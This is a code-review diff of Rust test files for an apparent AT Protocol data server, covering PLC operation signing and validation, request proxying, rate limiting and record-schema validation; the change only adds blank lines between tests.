&ctx); 180 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key"))); 181 } 182 + 183 #[test] 184 fn test_validate_handle_match() { 185 let key = SigningKey::random(&mut rand::thread_rng()); ··· 206 let result = validate_plc_operation_for_submission(&op, &ctx); 207 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle"))); 208 } 209 + 210 #[test] 211 fn test_validate_pds_service_type() { 212 let key = SigningKey::random(&mut rand::thread_rng()); ··· 233 let result = validate_plc_operation_for_submission(&op, &ctx); 234 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type"))); 235 } 236 + 237 #[test] 238 fn test_validate_pds_endpoint_match() { 239 let key = SigningKey::random(&mut rand::thread_rng()); ··· 260 let result = validate_plc_operation_for_submission(&op, &ctx); 261 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint"))); 262 } 263 + 264 #[test] 265 fn test_verify_signature_secp256k1() { 266 let key = SigningKey::random(&mut rand::thread_rng()); ··· 279 assert!(result.is_ok()); 280 assert!(result.unwrap()); 281 } 282 + 283 #[test] 284 fn test_verify_signature_wrong_key() { 285 let key = SigningKey::random(&mut rand::thread_rng()); ··· 299 assert!(result.is_ok()); 300 assert!(!result.unwrap()); 301 } 302 + 303 #[test] 304 fn test_verify_signature_invalid_did_key_format() { 305 let key = SigningKey::random(&mut rand::thread_rng()); ··· 317 assert!(result.is_ok()); 318 assert!(!result.unwrap()); 319 } 320 + 321 #[test] 322 fn test_tombstone_validation() { 323 let op = json!({ ··· 328 let result = validate_plc_operation(&op); 329 assert!(result.is_ok()); 330 } 331 + 332 #[test] 333 fn test_cid_for_cbor_deterministic() { 334 let value = json!({ ··· 340 assert_eq!(cid1, cid2, "CID generation should be deterministic"); 341 assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)"); 342 } 343 + 344 #[test] 345 fn test_cid_different_for_different_data() { 346 let value1 = json!({"data": 1}); ··· 349 let cid2 = cid_for_cbor(&value2).unwrap(); 350 assert_ne!(cid1, cid2, "Different data should produce different CIDs"); 351 } 352 + 353 #[test] 354 fn test_signing_key_to_did_key_format() { 355 let key = SigningKey::random(&mut rand::thread_rng()); ··· 357 assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z"); 358 assert!(did_key.len() > 50, "Did key should be reasonably long"); 359 } 360 + 361 #[test] 362 fn test_signing_key_to_did_key_unique() { 363 let key1 = SigningKey::random(&mut rand::thread_rng()); ··· 366 let did2 = signing_key_to_did_key(&key2); 367 assert_ne!(did1, did2, "Different keys should produce different did:keys"); 368 } 369 + 370 #[test] 371 fn test_signing_key_to_did_key_consistent() { 372 let key = SigningKey::random(&mut rand::thread_rng()); ··· 374 let did2 = signing_key_to_did_key(&key); 375 assert_eq!(did1, did2, "Same key should produce same did:key"); 376 } 377 + 378 #[test] 379 fn test_sign_operation_removes_existing_sig() { 380 let key = SigningKey::random(&mut rand::thread_rng()); ··· 391 let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap(); 392 assert_ne!(new_sig, "old_signature", "Should replace old signature"); 393 } 394 + 395 #[test] 396 fn test_validate_plc_operation_not_object() { 397 let result = validate_plc_operation(&json!("not an object")); 398 assert!(matches!(result, Err(PlcError::InvalidResponse(_)))); 399 } 400 + 401 #[test] 402 fn test_validate_for_submission_tombstone_passes() { 403 let key = SigningKey::random(&mut rand::thread_rng()); ··· 416 let result = validate_plc_operation_for_submission(&op, &ctx); 417 assert!(result.is_ok(), "Tombstone should pass submission validation"); 418 } 419 + 420 #[test] 421 fn test_verify_signature_missing_sig() { 422 let op = json!({ ··· 429 let result = verify_operation_signature(&op, &[]); 430 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig"))); 431 } 432 + 433 #[test] 434 fn test_verify_signature_invalid_base64() { 435 let op = json!({ ··· 443 let result = verify_operation_signature(&op, &[]); 444 assert!(matches!(result, Err(PlcError::InvalidResponse(_)))); 445 } 446 + 447 #[test] 448 fn test_plc_operation_struct() { 449 let mut services = HashMap::new();
+5
tests/proxy.rs
··· 4 use reqwest::Client; 5 use std::sync::Arc; 6 use tokio::net::TcpListener; 7 async fn spawn_mock_upstream() -> ( 8 String, 9 tokio::sync::mpsc::Receiver<(String, String, Option<String>)>, ··· 31 }); 32 (format!("http://{}", addr), rx) 33 } 34 #[tokio::test] 35 async fn test_proxy_via_header() { 36 let app_url = common::base_url().await; ··· 49 assert_eq!(uri, "/xrpc/com.example.test"); 50 assert_eq!(auth, Some("Bearer test-token".to_string())); 51 } 52 #[tokio::test] 53 async fn test_proxy_auth_signing() { 54 let app_url = common::base_url().await; ··· 77 assert_eq!(claims["aud"], upstream_url); 78 assert_eq!(claims["lxm"], "com.example.signed"); 79 } 80 #[tokio::test] 81 async fn test_proxy_post_with_body() { 82 let app_url = common::base_url().await; ··· 100 assert_eq!(uri, "/xrpc/com.example.postMethod"); 101 assert_eq!(auth, Some("Bearer test-token".to_string())); 102 } 103 #[tokio::test] 104 async fn test_proxy_with_query_params() { 105 let app_url = common::base_url().await;
··· 4 use reqwest::Client; 5 use std::sync::Arc; 6 use tokio::net::TcpListener; 7 + 8 async fn spawn_mock_upstream() -> ( 9 String, 10 tokio::sync::mpsc::Receiver<(String, String, Option<String>)>, ··· 32 }); 33 (format!("http://{}", addr), rx) 34 } 35 + 36 #[tokio::test] 37 async fn test_proxy_via_header() { 38 let app_url = common::base_url().await; ··· 51 assert_eq!(uri, "/xrpc/com.example.test"); 52 assert_eq!(auth, Some("Bearer test-token".to_string())); 53 } 54 + 55 #[tokio::test] 56 async fn test_proxy_auth_signing() { 57 let app_url = common::base_url().await; ··· 80 assert_eq!(claims["aud"], upstream_url); 81 assert_eq!(claims["lxm"], "com.example.signed"); 82 } 83 + 84 #[tokio::test] 85 async fn test_proxy_post_with_body() { 86 let app_url = common::base_url().await; ··· 104 assert_eq!(uri, "/xrpc/com.example.postMethod"); 105 assert_eq!(auth, Some("Bearer test-token".to_string())); 106 } 107 + 108 #[tokio::test] 109 async fn test_proxy_with_query_params() { 110 let app_url = common::base_url().await;
+5
tests/rate_limit.rs
··· 2 use common::{base_url, client}; 3 use reqwest::StatusCode; 4 use serde_json::json; 5 #[tokio::test] 6 #[ignore = "rate limiting is disabled in test environment"] 7 async fn test_login_rate_limiting() { ··· 39 rate_limited_count 40 ); 41 } 42 #[tokio::test] 43 #[ignore = "rate limiting is disabled in test environment"] 44 async fn test_password_reset_rate_limiting() { ··· 78 success_count 79 ); 80 } 81 #[tokio::test] 82 #[ignore = "rate limiting is disabled in test environment"] 83 async fn test_account_creation_rate_limiting() { ··· 117 rate_limited_count 118 ); 119 } 120 #[tokio::test] 121 async fn test_valkey_connection() { 122 if std::env::var("VALKEY_URL").is_err() { ··· 154 .await 155 .expect("DEL failed"); 156 } 157 #[tokio::test] 158 async fn test_distributed_rate_limiter_directly() { 159 if std::env::var("VALKEY_URL").is_err() {
··· 2 use common::{base_url, client}; 3 use reqwest::StatusCode; 4 use serde_json::json; 5 + 6 #[tokio::test] 7 #[ignore = "rate limiting is disabled in test environment"] 8 async fn test_login_rate_limiting() { ··· 40 rate_limited_count 41 ); 42 } 43 + 44 #[tokio::test] 45 #[ignore = "rate limiting is disabled in test environment"] 46 async fn test_password_reset_rate_limiting() { ··· 80 success_count 81 ); 82 } 83 + 84 #[tokio::test] 85 #[ignore = "rate limiting is disabled in test environment"] 86 async fn test_account_creation_rate_limiting() { ··· 120 rate_limited_count 121 ); 122 } 123 + 124 #[tokio::test] 125 async fn test_valkey_connection() { 126 if std::env::var("VALKEY_URL").is_err() { ··· 158 .await 159 .expect("DEL failed"); 160 } 161 + 162 #[tokio::test] 163 async fn test_distributed_rate_limiter_directly() { 164 if std::env::var("VALKEY_URL").is_err() {
+53
tests/record_validation.rs
··· 1 use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid}; 2 use serde_json::json; 3 fn now() -> String { 4 chrono::Utc::now().to_rfc3339() 5 } 6 #[test] 7 fn test_validate_post_valid() { 8 let validator = RecordValidator::new(); ··· 14 let result = validator.validate(&post, "app.bsky.feed.post"); 15 assert_eq!(result.unwrap(), ValidationStatus::Valid); 16 } 17 #[test] 18 fn test_validate_post_missing_text() { 19 let validator = RecordValidator::new(); ··· 24 let result = validator.validate(&post, "app.bsky.feed.post"); 25 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text")); 26 } 27 #[test] 28 fn test_validate_post_missing_created_at() { 29 let validator = RecordValidator::new(); ··· 34 let result = validator.validate(&post, "app.bsky.feed.post"); 35 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt")); 36 } 37 #[test] 38 fn test_validate_post_text_too_long() { 39 let validator = RecordValidator::new(); ··· 46 let result = validator.validate(&post, "app.bsky.feed.post"); 47 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text")); 48 } 49 #[test] 50 fn test_validate_post_text_at_limit() { 51 let validator = RecordValidator::new(); ··· 58 let result = validator.validate(&post, "app.bsky.feed.post"); 59 assert_eq!(result.unwrap(), ValidationStatus::Valid); 60 } 61 #[test] 62 fn test_validate_post_too_many_langs() { 63 let validator = RecordValidator::new(); ··· 70 let result = validator.validate(&post, "app.bsky.feed.post"); 71 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs")); 72 } 73 #[test] 74 fn test_validate_post_three_langs_ok() { 75 let validator = RecordValidator::new(); ··· 82 let result = validator.validate(&post, "app.bsky.feed.post"); 83 assert_eq!(result.unwrap(), ValidationStatus::Valid); 84 } 85 #[test] 86 fn test_validate_post_too_many_tags() { 87 let validator = RecordValidator::new(); ··· 94 let result = validator.validate(&post, "app.bsky.feed.post"); 95 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags")); 96 } 97 #[test] 98 fn test_validate_post_eight_tags_ok() { 99 let validator = RecordValidator::new(); ··· 106 let result = validator.validate(&post, "app.bsky.feed.post"); 107 assert_eq!(result.unwrap(), ValidationStatus::Valid); 108 } 109 #[test] 110 fn test_validate_post_tag_too_long() { 111 let validator = RecordValidator::new(); ··· 119 let result = validator.validate(&post, "app.bsky.feed.post"); 120 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))); 121 } 122 #[test] 123 fn test_validate_profile_valid() { 124 let validator = RecordValidator::new(); ··· 130 let result = validator.validate(&profile, "app.bsky.actor.profile"); 131 assert_eq!(result.unwrap(), ValidationStatus::Valid); 132 } 133 #[test] 134 fn test_validate_profile_empty_ok() { 135 let validator = RecordValidator::new(); ··· 139 let result = validator.validate(&profile, "app.bsky.actor.profile"); 140 assert_eq!(result.unwrap(), ValidationStatus::Valid); 141 } 142 #[test] 143 fn test_validate_profile_displayname_too_long() { 144 let validator = RecordValidator::new(); ··· 150 let result = validator.validate(&profile, "app.bsky.actor.profile"); 151 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 152 } 153 #[test] 154 fn test_validate_profile_description_too_long() { 155 let validator = RecordValidator::new(); ··· 161 let result = validator.validate(&profile, "app.bsky.actor.profile"); 162 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description")); 163 } 164 #[test] 165 fn test_validate_like_valid() { 166 let validator = RecordValidator::new(); ··· 175 let result = validator.validate(&like, "app.bsky.feed.like"); 176 assert_eq!(result.unwrap(), ValidationStatus::Valid); 177 } 178 #[test] 179 fn test_validate_like_missing_subject() { 180 let validator = RecordValidator::new(); ··· 185 let result = validator.validate(&like, "app.bsky.feed.like"); 186 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 187 } 188 #[test] 189 fn test_validate_like_missing_subject_uri() { 190 let validator = RecordValidator::new(); ··· 198 let result = validator.validate(&like, "app.bsky.feed.like"); 199 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri"))); 200 } 201 #[test] 202 fn test_validate_like_invalid_subject_uri() { 203 let validator = RecordValidator::new(); ··· 212 let result = validator.validate(&like, "app.bsky.feed.like"); 213 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))); 214 } 215 #[test] 216 fn test_validate_repost_valid() { 217 let validator = RecordValidator::new(); ··· 226 let result = validator.validate(&repost, "app.bsky.feed.repost"); 227 assert_eq!(result.unwrap(), ValidationStatus::Valid); 228 } 229 #[test] 230 fn test_validate_repost_missing_subject() { 231 let validator = RecordValidator::new(); ··· 236 let result = validator.validate(&repost, "app.bsky.feed.repost"); 237 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 238 } 239 #[test] 240 fn test_validate_follow_valid() { 241 let validator = RecordValidator::new(); ··· 247 let result = validator.validate(&follow, "app.bsky.graph.follow"); 248 assert_eq!(result.unwrap(), ValidationStatus::Valid); 249 } 250 #[test] 251 fn test_validate_follow_missing_subject() { 252 let validator = RecordValidator::new(); ··· 257 let result = validator.validate(&follow, "app.bsky.graph.follow"); 258 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 259 } 260 #[test] 261 fn test_validate_follow_invalid_subject() { 262 let validator = RecordValidator::new(); ··· 268 let result = validator.validate(&follow, "app.bsky.graph.follow"); 269 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 270 } 271 #[test] 272 fn test_validate_block_valid() { 273 let validator = RecordValidator::new(); ··· 279 let result = validator.validate(&block, "app.bsky.graph.block"); 280 assert_eq!(result.unwrap(), ValidationStatus::Valid); 281 } 282 #[test] 283 fn test_validate_block_invalid_subject() { 284 let validator = RecordValidator::new(); ··· 290 let result = validator.validate(&block, "app.bsky.graph.block"); 291 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 292 } 293 #[test] 294 fn test_validate_list_valid() { 295 let validator = RecordValidator::new(); ··· 302 let result = validator.validate(&list, "app.bsky.graph.list"); 303 assert_eq!(result.unwrap(), ValidationStatus::Valid); 304 } 305 #[test] 306 fn test_validate_list_name_too_long() { 307 let validator = RecordValidator::new(); ··· 315 let result = validator.validate(&list, "app.bsky.graph.list"); 316 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name")); 317 } 318 #[test] 319 fn test_validate_list_empty_name() { 320 let validator = RecordValidator::new(); ··· 327 let result = validator.validate(&list, "app.bsky.graph.list"); 328 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name")); 329 } 330 #[test] 331 fn test_validate_feed_generator_valid() { 332 let validator = RecordValidator::new(); ··· 339 let result = validator.validate(&generator, "app.bsky.feed.generator"); 340 assert_eq!(result.unwrap(), ValidationStatus::Valid); 341 } 342 #[test] 343 fn test_validate_feed_generator_displayname_too_long() { 344 let validator = RecordValidator::new(); ··· 352 let result = validator.validate(&generator, "app.bsky.feed.generator"); 353 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 354 } 355 #[test] 356 fn test_validate_unknown_type_returns_unknown() { 357 let validator = RecordValidator::new(); ··· 362 let result = validator.validate(&custom, "com.custom.record"); 363 assert_eq!(result.unwrap(), ValidationStatus::Unknown); 364 } 365 #[test] 366 fn test_validate_unknown_type_strict_rejects() { 367 let validator = RecordValidator::new().require_lexicon(true); ··· 372 let result = validator.validate(&custom, "com.custom.record"); 373 assert!(matches!(result, Err(ValidationError::UnknownType(_)))); 374 } 375 #[test] 376 fn test_validate_type_mismatch() { 377 let validator = RecordValidator::new(); ··· 384 assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual }) 385 if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like")); 386 } 387 #[test] 388 fn test_validate_missing_type() { 389 let validator = RecordValidator::new(); ··· 393 let result = validator.validate(&record, "app.bsky.feed.post"); 394 assert!(matches!(result, Err(ValidationError::MissingType))); 395 } 396 #[test] 397 fn test_validate_not_object() { 398 let validator = RecordValidator::new(); ··· 400 let result = validator.validate(&record, "app.bsky.feed.post"); 401 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 402 } 403 #[test] 404 fn test_validate_datetime_format_valid() { 405 let validator = RecordValidator::new(); ··· 411 let result = validator.validate(&post, "app.bsky.feed.post"); 412 assert_eq!(result.unwrap(), ValidationStatus::Valid); 413 } 414 #[test] 415 fn test_validate_datetime_with_offset() { 416 let validator = RecordValidator::new(); ··· 422 let result = validator.validate(&post, "app.bsky.feed.post"); 423 assert_eq!(result.unwrap(), ValidationStatus::Valid); 424 } 425 #[test] 426 fn test_validate_datetime_invalid_format() { 427 let validator = RecordValidator::new(); ··· 433 let result = validator.validate(&post, "app.bsky.feed.post"); 434 assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. }))); 435 } 436 #[test] 437 fn test_validate_record_key_valid() { 438 assert!(validate_record_key("3k2n5j2").is_ok()); ··· 442 assert!(validate_record_key("valid~key").is_ok()); 443 assert!(validate_record_key("self").is_ok()); 444 } 445 #[test] 446 fn test_validate_record_key_empty() { 447 let result = validate_record_key(""); 448 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 449 } 450 #[test] 451 fn test_validate_record_key_dot() { 452 assert!(validate_record_key(".").is_err()); 453 assert!(validate_record_key("..").is_err()); 454 } 455 #[test] 456 fn test_validate_record_key_invalid_chars() { 457 assert!(validate_record_key("invalid/key").is_err()); ··· 459 assert!(validate_record_key("invalid@key").is_err()); 460 assert!(validate_record_key("invalid#key").is_err()); 461 } 462 #[test] 463 fn test_validate_record_key_too_long() { 464 let long_key = "k".repeat(513); 465 let result = validate_record_key(&long_key); 466 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 467 } 468 #[test] 469 fn test_validate_record_key_at_max_length() { 470 let max_key = "k".repeat(512); 471 assert!(validate_record_key(&max_key).is_ok()); 472 } 473 #[test] 474 fn test_validate_collection_nsid_valid() { 475 assert!(validate_collection_nsid("app.bsky.feed.post").is_ok()); ··· 477 assert!(validate_collection_nsid("a.b.c").is_ok()); 478 assert!(validate_collection_nsid("my-app.domain.record-type").is_ok()); 479 } 480 #[test] 481 fn test_validate_collection_nsid_empty() { 482 let result = validate_collection_nsid(""); 483 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 484 } 485 #[test] 486 fn test_validate_collection_nsid_too_few_segments() { 487 assert!(validate_collection_nsid("a").is_err()); 488 assert!(validate_collection_nsid("a.b").is_err()); 489 } 490 #[test] 491 fn test_validate_collection_nsid_empty_segment() { 492 assert!(validate_collection_nsid("a..b.c").is_err()); 493 assert!(validate_collection_nsid(".a.b.c").is_err()); 494 assert!(validate_collection_nsid("a.b.c.").is_err()); 495 } 496 #[test] 497 fn test_validate_collection_nsid_invalid_chars() { 498 assert!(validate_collection_nsid("a.b.c/d").is_err()); 499 assert!(validate_collection_nsid("a.b.c_d").is_err()); 500 assert!(validate_collection_nsid("a.b.c@d").is_err()); 501 } 502 #[test] 503 fn test_validate_threadgate() { 504 let validator = RecordValidator::new(); ··· 510 let result = validator.validate(&gate, "app.bsky.feed.threadgate"); 511 assert_eq!(result.unwrap(), ValidationStatus::Valid); 512 } 513 #[test] 514 fn test_validate_labeler_service() { 515 let validator = RecordValidator::new(); ··· 523 let result = validator.validate(&labeler, "app.bsky.labeler.service"); 524 assert_eq!(result.unwrap(), ValidationStatus::Valid); 525 } 526 #[test] 527 fn test_validate_list_item() { 528 let validator = RecordValidator::new();
··· 1 use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid}; 2 use serde_json::json; 3 + 4 fn now() -> String { 5 chrono::Utc::now().to_rfc3339() 6 } 7 + 8 #[test] 9 fn test_validate_post_valid() { 10 let validator = RecordValidator::new(); ··· 16 let result = validator.validate(&post, "app.bsky.feed.post"); 17 assert_eq!(result.unwrap(), ValidationStatus::Valid); 18 } 19 + 20 #[test] 21 fn test_validate_post_missing_text() { 22 let validator = RecordValidator::new(); ··· 27 let result = validator.validate(&post, "app.bsky.feed.post"); 28 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text")); 29 } 30 + 31 #[test] 32 fn test_validate_post_missing_created_at() { 33 let validator = RecordValidator::new(); ··· 38 let result = validator.validate(&post, "app.bsky.feed.post"); 39 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt")); 40 } 41 + 42 #[test] 43 fn test_validate_post_text_too_long() { 44 let validator = RecordValidator::new(); ··· 51 let result = validator.validate(&post, "app.bsky.feed.post"); 52 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text")); 53 } 54 + 55 #[test] 56 fn test_validate_post_text_at_limit() { 57 let validator = RecordValidator::new(); ··· 64 let result = validator.validate(&post, "app.bsky.feed.post"); 65 assert_eq!(result.unwrap(), ValidationStatus::Valid); 66 } 67 + 68 #[test] 69 fn test_validate_post_too_many_langs() { 70 let validator = RecordValidator::new(); ··· 77 let result = validator.validate(&post, "app.bsky.feed.post"); 78 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs")); 79 } 80 + 81 #[test] 82 fn test_validate_post_three_langs_ok() { 83 let validator = RecordValidator::new(); ··· 90 let result = validator.validate(&post, "app.bsky.feed.post"); 91 assert_eq!(result.unwrap(), ValidationStatus::Valid); 92 } 93 + 94 #[test] 95 fn test_validate_post_too_many_tags() { 96 let validator = RecordValidator::new(); ··· 103 let result = validator.validate(&post, "app.bsky.feed.post"); 104 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags")); 105 } 106 + 107 #[test] 108 fn test_validate_post_eight_tags_ok() { 109 let validator = RecordValidator::new(); ··· 116 let result = validator.validate(&post, "app.bsky.feed.post"); 117 assert_eq!(result.unwrap(), ValidationStatus::Valid); 118 } 119 + 120 #[test] 121 fn test_validate_post_tag_too_long() { 122 let validator = RecordValidator::new(); ··· 130 let result = validator.validate(&post, "app.bsky.feed.post"); 131 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))); 132 } 133 + 134 #[test] 135 fn test_validate_profile_valid() { 136 let validator = RecordValidator::new(); ··· 142 let result = validator.validate(&profile, "app.bsky.actor.profile"); 143 assert_eq!(result.unwrap(), ValidationStatus::Valid); 144 } 145 + 146 #[test] 147 fn test_validate_profile_empty_ok() { 148 let validator = RecordValidator::new(); ··· 152 let result = validator.validate(&profile, "app.bsky.actor.profile"); 153 assert_eq!(result.unwrap(), ValidationStatus::Valid); 154 } 155 + 156 #[test] 157 fn test_validate_profile_displayname_too_long() { 158 let validator = RecordValidator::new(); ··· 164 let result = validator.validate(&profile, "app.bsky.actor.profile"); 165 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 166 } 167 + 168 #[test] 169 fn test_validate_profile_description_too_long() { 170 let validator = RecordValidator::new(); ··· 176 let result = validator.validate(&profile, "app.bsky.actor.profile"); 177 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description")); 178 } 179 + 180 #[test] 181 fn test_validate_like_valid() { 182 let validator = RecordValidator::new(); ··· 191 let result = validator.validate(&like, "app.bsky.feed.like"); 192 assert_eq!(result.unwrap(), ValidationStatus::Valid); 193 } 194 + 195 #[test] 196 fn test_validate_like_missing_subject() { 197 let validator = RecordValidator::new(); ··· 202 let result = validator.validate(&like, "app.bsky.feed.like"); 203 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 204 } 205 + 206 #[test] 207 fn test_validate_like_missing_subject_uri() { 208 let validator = RecordValidator::new(); ··· 216 let result = validator.validate(&like, "app.bsky.feed.like"); 217 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri"))); 218 } 219 + 220 #[test] 221 fn test_validate_like_invalid_subject_uri() { 222 let validator = RecordValidator::new(); ··· 231 let result = validator.validate(&like, "app.bsky.feed.like"); 232 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))); 233 } 234 + 235 #[test] 236 fn test_validate_repost_valid() { 237 let validator = RecordValidator::new(); ··· 246 let result = validator.validate(&repost, "app.bsky.feed.repost"); 247 assert_eq!(result.unwrap(), ValidationStatus::Valid); 248 } 249 + 250 #[test] 251 fn test_validate_repost_missing_subject() { 252 let validator = RecordValidator::new(); ··· 257 let result = validator.validate(&repost, "app.bsky.feed.repost"); 258 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 259 } 260 + 261 #[test] 262 fn test_validate_follow_valid() { 263 let validator = RecordValidator::new(); ··· 269 let result = validator.validate(&follow, "app.bsky.graph.follow"); 270 assert_eq!(result.unwrap(), ValidationStatus::Valid); 271 } 272 + 273 #[test] 274 fn test_validate_follow_missing_subject() { 275 let validator = RecordValidator::new(); ··· 280 let result = validator.validate(&follow, "app.bsky.graph.follow"); 281 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 282 } 283 + 284 #[test] 285 fn test_validate_follow_invalid_subject() { 286 let validator = RecordValidator::new(); ··· 292 let result = validator.validate(&follow, "app.bsky.graph.follow"); 293 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 294 } 295 + 296 #[test] 297 fn test_validate_block_valid() { 298 let validator = RecordValidator::new(); ··· 304 let result = validator.validate(&block, "app.bsky.graph.block"); 305 assert_eq!(result.unwrap(), ValidationStatus::Valid); 306 } 307 + 308 #[test] 309 fn test_validate_block_invalid_subject() { 310 let validator = RecordValidator::new(); ··· 316 let result = validator.validate(&block, "app.bsky.graph.block"); 317 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 318 } 319 + 320 #[test] 321 fn test_validate_list_valid() { 322 let validator = RecordValidator::new(); ··· 329 let result = validator.validate(&list, "app.bsky.graph.list"); 330 assert_eq!(result.unwrap(), ValidationStatus::Valid); 331 } 332 + 333 #[test] 334 fn test_validate_list_name_too_long() { 335 let validator = RecordValidator::new(); ··· 343 let result = validator.validate(&list, "app.bsky.graph.list"); 344 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name")); 345 } 346 + 347 #[test] 348 fn test_validate_list_empty_name() { 349 let validator = RecordValidator::new(); ··· 356 let result = validator.validate(&list, "app.bsky.graph.list"); 357 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name")); 358 } 359 + 360 #[test] 361 fn test_validate_feed_generator_valid() { 362 let validator = RecordValidator::new(); ··· 369 let result = validator.validate(&generator, "app.bsky.feed.generator"); 370 assert_eq!(result.unwrap(), ValidationStatus::Valid); 371 } 372 + 373 #[test] 374 fn test_validate_feed_generator_displayname_too_long() { 375 let validator = RecordValidator::new(); ··· 383 let result = validator.validate(&generator, "app.bsky.feed.generator"); 384 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 385 } 386 + 387 #[test] 388 fn test_validate_unknown_type_returns_unknown() { 389 let validator = RecordValidator::new(); ··· 394 let result = validator.validate(&custom, "com.custom.record"); 395 assert_eq!(result.unwrap(), ValidationStatus::Unknown); 396 } 397 + 398 #[test] 399 fn test_validate_unknown_type_strict_rejects() { 400 let validator = RecordValidator::new().require_lexicon(true); ··· 405 let result = validator.validate(&custom, "com.custom.record"); 406 assert!(matches!(result, Err(ValidationError::UnknownType(_)))); 407 } 408 + 409 #[test] 410 fn test_validate_type_mismatch() { 411 let validator = RecordValidator::new(); ··· 418 assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual }) 419 if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like")); 420 } 421 + 422 #[test] 423 fn test_validate_missing_type() { 424 let validator = RecordValidator::new(); ··· 428 let result = validator.validate(&record, "app.bsky.feed.post"); 429 assert!(matches!(result, Err(ValidationError::MissingType))); 430 } 431 + 432 #[test] 433 fn test_validate_not_object() { 434 let validator = RecordValidator::new(); ··· 436 let result = validator.validate(&record, "app.bsky.feed.post"); 437 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 438 } 439 + 440 #[test] 441 fn test_validate_datetime_format_valid() { 442 let validator = RecordValidator::new(); ··· 448 let result = validator.validate(&post, "app.bsky.feed.post"); 449 assert_eq!(result.unwrap(), ValidationStatus::Valid); 450 } 451 + 452 #[test] 453 fn test_validate_datetime_with_offset() { 454 let validator = RecordValidator::new(); ··· 460 let result = validator.validate(&post, "app.bsky.feed.post"); 461 assert_eq!(result.unwrap(), ValidationStatus::Valid); 462 } 463 + 464 #[test] 465 fn test_validate_datetime_invalid_format() { 466 let validator = RecordValidator::new(); ··· 472 let result = validator.validate(&post, "app.bsky.feed.post"); 473 assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. }))); 474 } 475 + 476 #[test] 477 fn test_validate_record_key_valid() { 478 assert!(validate_record_key("3k2n5j2").is_ok()); ··· 482 assert!(validate_record_key("valid~key").is_ok()); 483 assert!(validate_record_key("self").is_ok()); 484 } 485 + 486 #[test] 487 fn test_validate_record_key_empty() { 488 let result = validate_record_key(""); 489 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 490 } 491 + 492 #[test] 493 fn test_validate_record_key_dot() { 494 assert!(validate_record_key(".").is_err()); 495 assert!(validate_record_key("..").is_err()); 496 } 497 + 498 #[test] 499 fn test_validate_record_key_invalid_chars() { 500 assert!(validate_record_key("invalid/key").is_err()); ··· 502 assert!(validate_record_key("invalid@key").is_err()); 503 assert!(validate_record_key("invalid#key").is_err()); 504 } 505 + 506 #[test] 507 fn test_validate_record_key_too_long() { 508 let long_key = "k".repeat(513); 509 let result = validate_record_key(&long_key); 510 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 511 } 512 + 513 #[test] 514 fn test_validate_record_key_at_max_length() { 515 let max_key = "k".repeat(512); 516 assert!(validate_record_key(&max_key).is_ok()); 517 } 518 + 519 